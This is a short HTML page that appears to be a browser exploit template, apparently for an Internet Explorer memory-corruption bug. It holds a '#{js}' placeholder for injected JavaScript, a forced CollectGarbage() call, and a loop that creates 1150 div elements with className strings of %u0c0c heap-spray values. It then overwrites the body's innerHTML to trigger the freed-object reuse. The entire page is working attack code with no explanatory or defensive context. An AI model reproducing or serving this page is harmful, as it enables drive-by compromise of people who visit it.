<html>
    <head>
    <script>
    #{js}
    </script>
    <script>
    var data;
    var objArray = new Array(1150);

    setTimeout(function(){
      document.body.style.whiteSpace = "pre-line";

      CollectGarbage();

      for (var i=0;i<1150;i++){
        objArray[i] = document.createElement('div');
        objArray[i].className = data += unescape("%u0c0c%u0c0c");
      }

      setTimeout(function(){document.body.innerHTML = "boo"}, 100)
    }, 100)

    </script>
    </head>
    <body>
    <p> </p>
    </body>
    </html>